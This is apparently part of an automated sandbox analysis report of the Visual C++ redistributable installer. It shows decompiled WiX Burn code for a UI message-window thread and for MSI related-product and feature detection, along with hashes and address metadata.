                                                                          • Instruction Fuzzy Hash: DE324AB0C2537D8BDB65CF49C9897DDBAB8BB49B04F5081DAE20CA6600D7B50B84DF84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000CE563 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 135registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E000CE563(signed int _a4) {
				int _v8;
				void _v12;
				struct tagMSG _v40;
				struct _WNDCLASSW _v80;
				int _t35;
				intOrPtr _t37;
				short _t40;
				struct HWND__* _t44;
				int _t47;
				int _t52;
				signed short _t57;
				signed short _t60;
				void** _t64;
				signed int _t65;
				void* _t77;
				struct HWND__* _t79;

				_t64 = _a4;
				_t65 = 0xa;
				_t79 = 0;
				_t35 = memset( &_v80, 0, _t65 << 2);
				_push(7);
				_v12 = 0;
				memset( &_v40, _t35, 0 << 2);
				_t77 = _t64[2];
				_v8 = 0;
				_t37 =  *((intOrPtr*)(_t77 + 0x490));
				_a4 = 0 | _t37 == 0x00000002;
				if(_t37 != 2 || TlsSetValue( *(_t77 + 0x498),  *(_t77 + 0x4b0)) != 0) {
					_v80.hInstance = _t64[1];
					_v80.lpfnWndProc = E000CE705;
					_v80.lpszClassName = L"WixBurnMessageWindow";
					_t40 = RegisterClassW( &_v80); // executed
					if(_t40 != 0) {
						_v12 = _a4;
						_v8 = _t77 + 0xb8;
						_t44 = CreateWindowExW(0x80, _v80.lpszClassName, _t79, 0x90000000, 0x80000000, 8, _t79, _t79, _t79, _t79, _t64[1],  &_v12); // executed
						if(_t44 != 0) {
							 *(_t77 + 0x3e0) = _t44;
							SetEvent( *_t64);
							while(1) {
								_t47 = GetMessageW( &_v40, _t79, _t79, _t79);
								if(_t47 == 0) {
									break;
								}
								if(_t47 == 0xffffffff) {
									_t79 = 0x8000ffff;
									_push("Unexpected return value from message pump.");
									L14:
									_push(_t79);
									E000F012F();
									goto L15;
								}
								_t52 = IsDialogMessageW(_v40,  &_v40); // executed
								if(_t52 == 0) {
									TranslateMessage( &_v40);
									DispatchMessageW( &_v40);
								}
							}
							goto L15;
						}
						_t57 = GetLastError();
						_t82 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
						_t79 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "uithread.cpp", 0x8a, _t79);
						_push("Failed to create window.");
						goto L14;
					}
					_t60 = GetLastError();
					_t85 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					_t79 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "uithread.cpp", 0x80, _t79);
					_push("Failed to register window.");
					goto L14;
				} else {
					_t79 = 0x8007139f;
					L15:
					UnregisterClassW(L"WixBurnMessageWindow", _t64[1]);
					return _t79;
				}
			}



















                                                                          0x000ce56a
                                                                          0x000ce573
                                                                          0x000ce577
                                                                          0x000ce579
                                                                          0x000ce57b
                                                                          0x000ce581
                                                                          0x000ce584
                                                                          0x000ce586
                                                                          0x000ce58b
                                                                          0x000ce58e
                                                                          0x000ce59a
                                                                          0x000ce5a0
                                                                          0x000ce5c5
                                                                          0x000ce5cc
                                                                          0x000ce5d3
                                                                          0x000ce5da
                                                                          0x000ce5e3
                                                                          0x000ce620
                                                                          0x000ce629
                                                                          0x000ce64c
                                                                          0x000ce654
                                                                          0x000ce68b
                                                                          0x000ce693
                                                                          0x000ce6cb
                                                                          0x000ce6d2
                                                                          0x000ce6d6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000ce6a4
                                                                          0x000ce6da
                                                                          0x000ce6df
                                                                          0x000ce6e4
                                                                          0x000ce6e4
                                                                          0x000ce6e5
                                                                          0x00000000
                                                                          0x000ce6eb
                                                                          0x000ce6ad
                                                                          0x000ce6b5
                                                                          0x000ce6bb
                                                                          0x000ce6c5
                                                                          0x000ce6c5
                                                                          0x000ce6b5
                                                                          0x00000000
                                                                          0x000ce6d8
                                                                          0x000ce656
                                                                          0x000ce667
                                                                          0x000ce671
                                                                          0x000ce67f
                                                                          0x000ce684
                                                                          0x00000000
                                                                          0x000ce684
                                                                          0x000ce5e5
                                                                          0x000ce5f6
                                                                          0x000ce600
                                                                          0x000ce60e
                                                                          0x000ce613
                                                                          0x00000000
                                                                          0x000ce5b8
                                                                          0x000ce5b8
                                                                          0x000ce6ec
                                                                          0x000ce6f4
                                                                          0x000ce702
                                                                          0x000ce702

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                          • String ID: @Met$Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                          • API String ID: 213125376-1135386840
                                                                          • Opcode ID: 427cd1986bcad81a3dadbb9ed4ee8e99830f30681a65443814fb7915b3a55cb9
                                                                          • Instruction ID: 880d4cbc554da336e78994f3faa5d1bd848c89c46b2746c63587e649224fcce5
                                                                          • Opcode Fuzzy Hash: 427cd1986bcad81a3dadbb9ed4ee8e99830f30681a65443814fb7915b3a55cb9
                                                                          • Instruction Fuzzy Hash: 4F41A476A40254ABEB209BA4DD44FEEBFE8FF08350F11412AF909E7590D7749900DBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D3870 Relevance: 28.6, APIs: 1, Strings: 15, Instructions: 589COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 62%
                                                                          			E000D3870(int __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				short _v88;
				char _v92;
				char _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				int _v124;
				int _v128;
				int _v132;
				signed int _v136;
				signed int _v140;
				char _v144;
				int _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t184;
				void* _t190;
				void* _t192;
				int _t195;
				int _t203;
				signed int _t204;
				int _t205;
				intOrPtr* _t206;
				int _t212;
				int _t213;
				intOrPtr* _t219;
				int _t220;
				int _t222;
				int _t224;
				int _t227;
				void* _t229;
				int _t231;
				intOrPtr _t238;
				intOrPtr* _t246;
				int _t257;
				intOrPtr* _t258;
				int _t261;
				void* _t263;
				int _t265;
				intOrPtr* _t270;
				int _t280;
				intOrPtr* _t281;
				int _t282;
				intOrPtr* _t288;
				int _t290;
				void* _t291;
				int _t294;
				int _t298;
				intOrPtr _t300;
				int _t303;
				void* _t305;
				intOrPtr _t307;
				int _t308;
				intOrPtr* _t317;
				void* _t318;
				intOrPtr* _t321;
				int _t322;
				int _t323;
				intOrPtr* _t326;
				signed int _t327;
				void* _t328;
				void* _t329;

				_t311 = __edx;
				_t184 =  *0x11a008; // 0xf77c1860
				_v8 = _t184 ^ _t327;
				_v140 = _v140 | 0xffffffff;
				_t317 = _a4;
				_t290 = 0;
				_v108 = _a8;
				_v92 = 0;
				_v120 = 0;
				_v96 = 0;
				_v144 = 0;
				_v100 = 0;
				E000DF670(_t317,  &_v88, 0, 0x4e);
				_t329 = _t328 + 0xc;
				_v132 = 0;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x70], xmm0");
				_push( &_v92);
				_push(L"VersionString");
				_t190 = 2;
				_t291 = 4;
				_t191 =  !=  ? _t291 : _t190;
				_push( !=  ? _t291 : _t190);
				_push(0);
				_push( *(_t317 + 0x90));
				_t192 = E000F28F8(_t291); // executed
				_t318 = _t192;
				if(_t318 < 0) {
					__eflags = _t318 - 0x80070645;
					if(_t318 == 0x80070645) {
						L21:
						_t195 = E000D7B88(_t317,  &_v144,  &_v96); // executed
						__eflags = _t195;
						if(_t195 < 0) {
							L33:
							 *(_t317 + 0x40) = 2;
							_t319 = _t290;
							goto L34;
						} else {
							__eflags =  *((intOrPtr*)(_t317 + 0x14)) - _t290;
							_push( &_v92);
							_push(L"VersionString");
							_t263 = 2;
							_t305 = 4;
							_t264 =  !=  ? _t305 : _t263;
							_push( !=  ? _t305 : _t263);
							_push(_t290);
							_push(_v96);
							_t265 = E000F28F8(_t305);
							__eflags = _t265;
							if(_t265 < 0) {
								goto L33;
							} else {
								_t319 = E000F4B5A(_t311, _v92, _t290,  &_v116);
								__eflags = _t319;
								if(_t319 >= 0) {
									__eflags =  *((intOrPtr*)(_t317 + 0x9c)) - _v112;
									if(__eflags > 0) {
										goto L33;
									} else {
										if(__eflags < 0) {
											L28:
											E000B550F(2, 0x2000006c,  *_t317);
											_t329 = _t329 + 0x1c;
											_t270 =  *((intOrPtr*)(_v108 + 0x10));
											_t319 = E000BD58B(_v108, 1,  *((intOrPtr*)( *_t270 + 0x34))(_t270,  *_t317, _v96, _v144, _v96, _v92,  *(_t317 + 0x90)));
											__eflags = _t319;
											if(_t319 >= 0) {
												_t67 = _t317 + 0xa0; // 0x158
												_t319 = E000B21A5(_t67, _v96, _t290);
												__eflags = _t319;
												if(_t319 >= 0) {
													 *((intOrPtr*)(_t317 + 0xa8)) = _v116;
													 *((intOrPtr*)(_t317 + 0xac)) = _v112;
													 *(_t317 + 0xd8) = 1;
													goto L33;
												} else {
													_push("Failed to copy the installed ProductCode to the package.");
													goto L119;
												}
											} else {
												E000B37D3(_t272, "msiengine.cpp", 0x1c4, _t319);
												_push("UX aborted detect compatible MSI package.");
												goto L119;
											}
										} else {
											__eflags =  *(_t317 + 0x98) - _v116;
											if( *(_t317 + 0x98) >= _v116) {
												goto L33;
											} else {
												goto L28;
											}
										}
									}
								} else {
									_push(_v96);
									goto L3;
								}
							}
						}
					} else {
						__eflags = _t318 - 0x80070648;
						if(_t318 == 0x80070648) {
							goto L21;
						} else {
							_push( *(_t317 + 0x90));
							_push("Failed to get product information for ProductCode: %ls");
							goto L20;
						}
					}
				} else {
					_t17 = _t317 + 0xa8; // 0x160
					_t280 = E000F4B5A(_t311, _v92, 0, _t17);
					_t319 = _t280;
					if(_t280 >= 0) {
						_t22 = _t317 + 0xa8; // 0x160
						_t281 = _t22;
						__eflags =  *((intOrPtr*)(_t317 + 0x9c)) -  *((intOrPtr*)(_t281 + 4));
						_t307 =  *_t281;
						_t311 =  *(_t317 + 0x98);
						if(__eflags > 0) {
							L8:
							__eflags =  *((intOrPtr*)(_t317 + 0x9c)) -  *((intOrPtr*)(_t281 + 4));
							_t311 =  *(_t317 + 0x98);
							if(__eflags < 0) {
								L12:
								_t308 = _t290;
							} else {
								if(__eflags > 0) {
									L11:
									_t308 = 2;
									_v100 = _t308;
								} else {
									__eflags = _t311 - _t307;
									if(_t311 <= _t307) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
							_t282 = 4;
							 *(_t317 + 0x40) = _t282;
							__eflags = _t308;
							if(_t308 == 0) {
								goto L34;
							} else {
								goto L14;
							}
						} else {
							if(__eflags < 0) {
								L7:
								 *(_t317 + 0x40) = 5;
								_t308 = 1;
								_v100 = 1;
								L14:
								_t33 = _t317 + 0xa8; // 0x160
								_t326 = _t33;
								E000B550F(2, 0x20000067,  *(_t317 + 0x90));
								_t329 = _t329 + 0x1c;
								_t288 =  *((intOrPtr*)(_v108 + 0x10));
								_t319 = E000BD58B(_v108, 1,  *((intOrPtr*)( *_t288 + 0x38))(_t288,  *_t317,  *(_t317 + 0x90),  *((intOrPtr*)(_t317 + 0x14)),  *_t326,  *((intOrPtr*)(_t326 + 4)), _v100, E000C40EF( *((intOrPtr*)(_t317 + 0x14))), E000C43FA( *_t326,  *((intOrPtr*)(_t326 + 4))),  *((intOrPtr*)(_t317 + 0x94)), E000C4107(_t308)));
								__eflags = _t319;
								if(_t319 >= 0) {
									L34:
									_v124 = _t290;
									__eflags =  *((intOrPtr*)(_t317 + 0xc8)) - _t290;
									if( *((intOrPtr*)(_t317 + 0xc8)) <= _t290) {
										L92:
										__eflags =  *(_t317 + 0xc0);
										if( *(_t317 + 0xc0) != 0) {
											_t203 = _t290;
											_v124 = _t290;
											do {
												_t311 =  *((intOrPtr*)(_t317 + 0xbc)) + _t203;
												_t294 = 4;
												_v128 = _t311;
												__eflags =  *(_t317 + 0x40) - _t294;
												if( *(_t317 + 0x40) < _t294) {
													_t204 = 2;
													_v140 = _t204;
													goto L99;
												} else {
													_t319 = E000F2CEE( *(_t317 + 0x90),  *_t311,  &_v140);
													__eflags = _t319;
													if(_t319 < 0) {
														_push("Failed to query feature state.");
														goto L119;
													} else {
														_t204 = _v140;
														_t311 = _v128;
														__eflags = _t204 - 0xffffffff;
														if(_t204 == 0xffffffff) {
															_t204 = 2;
															_v140 = _t204;
														}
														_t294 = 4;
														L99:
														_t205 = _t204 - 1;
														__eflags = _t205;
														if(_t205 == 0) {
															 *(_t311 + 0x1c) = 2;
															goto L113;
														} else {
															_t212 = _t205 - 1;
															__eflags = _t212;
															if(_t212 == 0) {
																 *(_t311 + 0x1c) = 1;
																goto L113;
															} else {
																_t213 = _t212 - 1;
																__eflags = _t213;
																if(_t213 == 0) {
																	 *(_t311 + 0x1c) = 3;
																	goto L113;
																} else {
																	_t214 = _t213 != 1;
																	__eflags = _t213 != 1;
																	if(_t213 != 1) {
																		_t319 = 0x8000ffff;
																		E000B37D3(_t214, "msiengine.cpp", 0x283, 0x8000ffff);
																		_push("Invalid state value.");
																		goto L119;
																	} else {
																		 *(_t311 + 0x1c) = _t294;
																		L113:
																		_t206 =  *((intOrPtr*)(_v108 + 0x10));
																		_t319 = E000BD58B(_v108, 1,  *((intOrPtr*)( *_t206 + 0x40))(_t206,  *_t317,  *_t311,  *(_t311 + 0x1c)));
																		__eflags = _t319;
																		if(_t319 < 0) {
																			E000B37D3(_t208, "msiengine.cpp", 0x289, _t319);
																			_push("UX aborted detect.");
																			goto L119;
																		} else {
																			goto L114;
																		}
																	}
																}
															}
														}
													}
												}
												goto L120;
												L114:
												_t290 = _t290 + 1;
												_t203 = _v124 + 0x28;
												_v124 = _t203;
												__eflags = _t290 -  *(_t317 + 0xc0);
											} while (_t290 <  *(_t317 + 0xc0));
										}
									} else {
										_t298 = _t290;
										_v128 = _t290;
										do {
											_t219 =  *((intOrPtr*)(_t317 + 0xc4)) + _t298;
											_v148 = _t290;
											_t299 =  &_v88;
											_v104 = _t219;
											_push( &_v88);
											_push(_t290);
											_push( *_t219);
											while(1) {
												_t220 = E000F2690(); // executed
												_t319 = _t220;
												__eflags = _t319 - 0x80070103;
												if(_t319 == 0x80070103) {
													goto L91;
												}
												__eflags = _t319;
												if(_t319 < 0) {
													_push("Failed to enum related products.");
													goto L119;
												} else {
													_t222 = CompareStringW(_t290, 1,  *(_t317 + 0x90), 0xffffffff,  &_v88, 0xffffffff);
													__eflags = _t222 - 2;
													if(_t222 == 2) {
														L88:
														_t321 = _v104;
														goto L89;
													} else {
														_t227 = E000F28F8(_t299,  &_v88, _t290, 2, L"VersionString",  &_v92); // executed
														_t322 = _t227;
														__eflags = _t322 - 0x80070645;
														if(_t322 == 0x80070645) {
															L43:
															_push( &_v92);
															_push(L"VersionString");
															_t229 = 4;
															_push(_t229);
															_push(_t290);
															_push( &_v88); // executed
															_t231 = E000F28F8(_t299); // executed
															_t319 = _t231;
															__eflags = _t319 - 0x80070645;
															if(_t319 == 0x80070645) {
																goto L88;
															} else {
																__eflags = _t319 - 0x80070648;
																if(_t319 == 0x80070648) {
																	goto L88;
																} else {
																	__eflags = _t319;
																	if(_t319 < 0) {
																		_push( &_v88);
																		_push("Failed to get version for product in machine context: %ls");
																		goto L20;
																	} else {
																		_v136 = 1;
																		goto L47;
																	}
																}
															}
														} else {
															__eflags = _t322 - 0x80070648;
															if(_t322 == 0x80070648) {
																goto L43;
															} else {
																__eflags = _t322;
																if(_t322 < 0) {
																	_push( &_v88);
																	_push("Failed to get version for product in user unmanaged context: %ls");
																	L20:
																	_push(_t319);
																	E000F012F();
																} else {
																	_v136 = _t290;
																	L47:
																	_t319 = E000F4B5A(_t311, _v92, _t290,  &_v116);
																	__eflags = _t319;
																	if(_t319 < 0) {
																		_push( &_v88);
																		goto L3;
																	} else {
																		_t321 = _v104;
																		_t300 = _v116;
																		_t238 = _v112;
																		__eflags =  *((intOrPtr*)(_t321 + 0x18)) - _t290;
																		if( *((intOrPtr*)(_t321 + 0x18)) == _t290) {
																			L57:
																			__eflags =  *((intOrPtr*)(_t321 + 0x1c)) - _t290;
																			if( *((intOrPtr*)(_t321 + 0x1c)) == _t290) {
																				L66:
																				_v132 = _t290;
																				__eflags =  *((intOrPtr*)(_t321 + 0x34)) - _t290;
																				if( *((intOrPtr*)(_t321 + 0x34)) == _t290) {
																					L79:
																					__eflags =  *((intOrPtr*)(_t321 + 0x28)) - _t290;
																					if( *((intOrPtr*)(_t321 + 0x28)) == _t290) {
																						_push(3);
																						_pop(1);
																						goto L86;
																					} else {
																						__eflags = _v100 - 3;
																						if(_v100 == 3) {
																							L84:
																							_t323 = _t290;
																						} else {
																							__eflags =  *(_t317 + 0x40) - 2;
																							if( *(_t317 + 0x40) != 2) {
																								goto L84;
																							} else {
																								 *(_t317 + 0x40) = 1;
																								L86:
																								_v100 = 1;
																								_t323 = 1;
																							}
																						}
																					}
																					E000B550F(2, 0x20000067,  &_v88); // executed
																					_t329 = _t329 + 0x1c;
																					_t246 =  *((intOrPtr*)(_v108 + 0x10));
																					_t311 =  &_v88;
																					_t319 = E000BD58B(_v108, 1,  *((intOrPtr*)( *_t246 + 0x38))(_t246,  *_t317,  &_v88, _v136, _v116, _v112, _t323, E000C40EF(_v136), E000C43FA(_v116, _v112), _v132, E000C4107(_t323)));
																					__eflags = _t319;
																					if(_t319 < 0) {
																						_push(_t319);
																						_push(0x257);
																						goto L16;
																					} else {
																						goto L88;
																					}
																				} else {
																					_t311 = _v136;
																					__eflags = E000F28F8(_t300,  &_v88, _t290, 2 + _v136 * 2, L"Language",  &_v120);
																					if(__eflags < 0) {
																						L83:
																						E000F00CF(_t311, __eflags, _t254, 0xe0000098, _t290,  &_v88, _v120, _t290);
																						goto L89;
																					} else {
																						__eflags = E000B29DC(_t300, _t311, _v120, _t290,  &_v132);
																						if(__eflags < 0) {
																							goto L83;
																						} else {
																							_t303 = _t290;
																							_t311 = _t290;
																							__eflags =  *((intOrPtr*)(_t321 + 0x34)) - _t303;
																							if( *((intOrPtr*)(_t321 + 0x34)) > _t303) {
																								_t258 =  *((intOrPtr*)(_t321 + 0x30));
																								while(1) {
																									__eflags = _v132 -  *_t258;
																									_t321 = _v104;
																									if(_v132 ==  *_t258) {
																										break;
																									}
																									_t303 = _t303 + 1;
																									_t258 = _t258 + 4;
																									__eflags = _t303 -  *((intOrPtr*)(_t321 + 0x34));
																									if(_t303 <  *((intOrPtr*)(_t321 + 0x34))) {
																										continue;
																									} else {
																									}
																									goto L75;
																								}
																								_t311 = 1;
																								__eflags = 1;
																							}
																							L75:
																							_t257 =  *(_t321 + 0x2c);
																							__eflags = _t257;
																							if(_t257 == 0) {
																								L78:
																								__eflags = _t311;
																								if(_t311 != 0) {
																									goto L89;
																								} else {
																									goto L79;
																								}
																							} else {
																								__eflags = _t311;
																								if(_t311 == 0) {
																									goto L89;
																								} else {
																									__eflags = _t257;
																									if(_t257 != 0) {
																										goto L79;
																									} else {
																										goto L78;
																									}
																								}
																							}
																						}
																					}
																				}
																			} else {
																				__eflags =  *((intOrPtr*)(_t321 + 0x24)) - _t290;
																				if( *((intOrPtr*)(_t321 + 0x24)) == _t290) {
																					__eflags = _t238 -  *((intOrPtr*)(_t321 + 0x14));
																					if(__eflags > 0) {
																						goto L89;
																					} else {
																						if(__eflags < 0) {
																							goto L66;
																						} else {
																							__eflags = _t300 -  *((intOrPtr*)(_t321 + 0x10));
																							if(_t300 >=  *((intOrPtr*)(_t321 + 0x10))) {
																								goto L89;
																							} else {
																								goto L66;
																							}
																						}
																					}
																				} else {
																					__eflags = _t238 -  *((intOrPtr*)(_t321 + 0x14));
																					if(__eflags > 0) {
																						goto L89;
																					} else {
																						if(__eflags < 0) {
																							goto L66;
																						} else {
																							__eflags = _t300 -  *((intOrPtr*)(_t321 + 0x10));
																							if(_t300 >  *((intOrPtr*)(_t321 + 0x10))) {
																								goto L89;
																							} else {
																								goto L66;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			__eflags =  *((intOrPtr*)(_t321 + 0x20)) - _t290;
																			if( *((intOrPtr*)(_t321 + 0x20)) == _t290) {
																				__eflags = _t238 -  *((intOrPtr*)(_t321 + 0xc));
																				if(__eflags < 0) {
																					goto L89;
																				} else {
																					if(__eflags > 0) {
																						goto L57;
																					} else {
																						__eflags = _t300 -  *((intOrPtr*)(_t321 + 8));
																						if(_t300 <=  *((intOrPtr*)(_t321 + 8))) {
																							goto L89;
																						} else {
																							goto L57;
																						}
																					}
																				}
																			} else {
																				__eflags = _t238 -  *((intOrPtr*)(_t321 + 0xc));
																				if(__eflags < 0) {
																					L89:
																					_t299 =  &_v88;
																					_t224 = _v148 + 1;
																					__eflags = _t224;
																					_push( &_v88);
																					_push(_t224);
																					_push( *_t321);
																					_v148 = _t224;
																					continue;
																				} else {
																					if(__eflags > 0) {
																						goto L57;
																					} else {
																						__eflags = _t300 -  *((intOrPtr*)(_t321 + 8));
																						if(_t300 <  *((intOrPtr*)(_t321 + 8))) {
																							goto L89;
																						} else {
																							goto L57;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
												goto L120;
											}
											L91:
											_t319 = _t290;
											_t261 = _v124 + 1;
											_t298 = _v128 + 0x38;
											_v124 = _t261;
											_v128 = _t298;
											__eflags = _t261 -  *((intOrPtr*)(_t317 + 0xc8));
										} while (_t261 <  *((intOrPtr*)(_t317 + 0xc8)));
										goto L92;
									}
								} else {
									_push(_t319);
									_push(0x1af);
									L16:
									_push("msiengine.cpp");
									E000B37D3(_t248);
									_push("UX aborted detect related MSI package.");
									L119:
									_push(_t319);
									E000F012F();
								}
							} else {
								__eflags = _t311 - _t307;
								if(_t311 >= _t307) {
									goto L8;
								} else {
									goto L7;
								}
							}
						}
					} else {
						_push( *(_t317 + 0x90));
						L3:
						E000F012F(_t319, "Failed to convert version: %ls to DWORD64 for ProductCode: %ls", _v92);
					}
				}
				L120:
				if(_v144 != 0) {
					E000F54EF(_v144);
				}
				if(_v96 != 0) {
					E000F54EF(_v96);
				}
				if(_v120 != 0) {
					E000F54EF(_v120);
				}
				if(_v92 != 0) {
					E000F54EF(_v92);
				}
				return E000DDE36(_t290, _v8 ^ _t327, _t311, _t317, _t319);
			}







































































                                                                          0x000d3870
                                                                          0x000d3879
                                                                          0x000d3880
                                                                          0x000d3886
                                                                          0x000d3890
                                                                          0x000d3893
                                                                          0x000d3897
                                                                          0x000d389f
                                                                          0x000d38a2
                                                                          0x000d38a5
                                                                          0x000d38a8
                                                                          0x000d38ae
                                                                          0x000d38b1
                                                                          0x000d38b6
                                                                          0x000d38b9
                                                                          0x000d38c2
                                                                          0x000d38c5
                                                                          0x000d38ca
                                                                          0x000d38cb
                                                                          0x000d38d2
                                                                          0x000d38d5
                                                                          0x000d38d6
                                                                          0x000d38d9
                                                                          0x000d38da
                                                                          0x000d38db
                                                                          0x000d38e1
                                                                          0x000d38e6
                                                                          0x000d38ea
                                                                          0x000d3a09
                                                                          0x000d3a0f
                                                                          0x000d3a32
                                                                          0x000d3a3e
                                                                          0x000d3a43
                                                                          0x000d3a45
                                                                          0x000d3b46
                                                                          0x000d3b46
                                                                          0x000d3b4d
                                                                          0x00000000
                                                                          0x000d3a4b
                                                                          0x000d3a4b
                                                                          0x000d3a51
                                                                          0x000d3a52
                                                                          0x000d3a59
                                                                          0x000d3a5c
                                                                          0x000d3a5d
                                                                          0x000d3a60
                                                                          0x000d3a61
                                                                          0x000d3a62
                                                                          0x000d3a65
                                                                          0x000d3a6a
                                                                          0x000d3a6c
                                                                          0x00000000
                                                                          0x000d3a72
                                                                          0x000d3a7f
                                                                          0x000d3a81
                                                                          0x000d3a83
                                                                          0x000d3a93
                                                                          0x000d3a96
                                                                          0x00000000
                                                                          0x000d3a9c
                                                                          0x000d3a9c
                                                                          0x000d3aad
                                                                          0x000d3ac8
                                                                          0x000d3ad0
                                                                          0x000d3ad3
                                                                          0x000d3aea
                                                                          0x000d3aec
                                                                          0x000d3aee
                                                                          0x000d3b0e
                                                                          0x000d3b1a
                                                                          0x000d3b1c
                                                                          0x000d3b1e
                                                                          0x000d3b2d
                                                                          0x000d3b36
                                                                          0x000d3b3c
                                                                          0x00000000
                                                                          0x000d3b20
                                                                          0x000d3b20
                                                                          0x00000000
                                                                          0x000d3b20
                                                                          0x000d3af0
                                                                          0x000d3afb
                                                                          0x000d3b00
                                                                          0x00000000
                                                                          0x000d3b00
                                                                          0x000d3a9e
                                                                          0x000d3aa4
                                                                          0x000d3aa7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3aa7
                                                                          0x000d3a9c
                                                                          0x000d3a85
                                                                          0x000d3a85
                                                                          0x00000000
                                                                          0x000d3a85
                                                                          0x000d3a83
                                                                          0x000d3a6c
                                                                          0x000d3a11
                                                                          0x000d3a11
                                                                          0x000d3a17
                                                                          0x00000000
                                                                          0x000d3a19
                                                                          0x000d3a19
                                                                          0x000d3a1f
                                                                          0x00000000
                                                                          0x000d3a1f
                                                                          0x000d3a17
                                                                          0x000d38f0
                                                                          0x000d38f0
                                                                          0x000d38fb
                                                                          0x000d3900
                                                                          0x000d3904
                                                                          0x000d3928
                                                                          0x000d3928
                                                                          0x000d392e
                                                                          0x000d3931
                                                                          0x000d3933
                                                                          0x000d3939
                                                                          0x000d3950
                                                                          0x000d3956
                                                                          0x000d3959
                                                                          0x000d395f
                                                                          0x000d396f
                                                                          0x000d396f
                                                                          0x000d3961
                                                                          0x000d3961
                                                                          0x000d3967
                                                                          0x000d3969
                                                                          0x000d396a
                                                                          0x000d3963
                                                                          0x000d3963
                                                                          0x000d3965
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3965
                                                                          0x000d3961
                                                                          0x000d3973
                                                                          0x000d3974
                                                                          0x000d3977
                                                                          0x000d3979
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d393b
                                                                          0x000d393b
                                                                          0x000d3941
                                                                          0x000d3943
                                                                          0x000d394a
                                                                          0x000d394b
                                                                          0x000d397f
                                                                          0x000d398c
                                                                          0x000d398c
                                                                          0x000d39b3
                                                                          0x000d39bb
                                                                          0x000d39c1
                                                                          0x000d39e5
                                                                          0x000d39e7
                                                                          0x000d39e9
                                                                          0x000d3b4f
                                                                          0x000d3b4f
                                                                          0x000d3b52
                                                                          0x000d3b58
                                                                          0x000d3e14
                                                                          0x000d3e1a
                                                                          0x000d3e1c
                                                                          0x000d3e22
                                                                          0x000d3e24
                                                                          0x000d3e27
                                                                          0x000d3e2f
                                                                          0x000d3e31
                                                                          0x000d3e32
                                                                          0x000d3e35
                                                                          0x000d3e38
                                                                          0x000d3ecf
                                                                          0x000d3ed0
                                                                          0x00000000
                                                                          0x000d3e3e
                                                                          0x000d3e52
                                                                          0x000d3e54
                                                                          0x000d3e56
                                                                          0x000d3f2b
                                                                          0x00000000
                                                                          0x000d3e5c
                                                                          0x000d3e5c
                                                                          0x000d3e62
                                                                          0x000d3e65
                                                                          0x000d3e68
                                                                          0x000d3e6c
                                                                          0x000d3e6d
                                                                          0x000d3e6d
                                                                          0x000d3e75
                                                                          0x000d3e76
                                                                          0x000d3e76
                                                                          0x000d3e76
                                                                          0x000d3e79
                                                                          0x000d3eea
                                                                          0x00000000
                                                                          0x000d3e7b
                                                                          0x000d3e7b
                                                                          0x000d3e7b
                                                                          0x000d3e7e
                                                                          0x000d3ee1
                                                                          0x00000000
                                                                          0x000d3e80
                                                                          0x000d3e80
                                                                          0x000d3e80
                                                                          0x000d3e83
                                                                          0x000d3ed8
                                                                          0x00000000
                                                                          0x000d3e85
                                                                          0x000d3e85
                                                                          0x000d3e85
                                                                          0x000d3e88
                                                                          0x000d3f32
                                                                          0x000d3f42
                                                                          0x000d3f47
                                                                          0x00000000
                                                                          0x000d3e8e
                                                                          0x000d3e8e
                                                                          0x000d3ef1
                                                                          0x000d3ef9
                                                                          0x000d3f0d
                                                                          0x000d3f0f
                                                                          0x000d3f11
                                                                          0x000d3f59
                                                                          0x000d3f5e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3f11
                                                                          0x000d3e88
                                                                          0x000d3e83
                                                                          0x000d3e7e
                                                                          0x000d3e79
                                                                          0x000d3e56
                                                                          0x00000000
                                                                          0x000d3f13
                                                                          0x000d3f16
                                                                          0x000d3f17
                                                                          0x000d3f1a
                                                                          0x000d3f1d
                                                                          0x000d3f1d
                                                                          0x000d3f29
                                                                          0x000d3b5e
                                                                          0x000d3b5e
                                                                          0x000d3b60
                                                                          0x000d3b63
                                                                          0x000d3b69
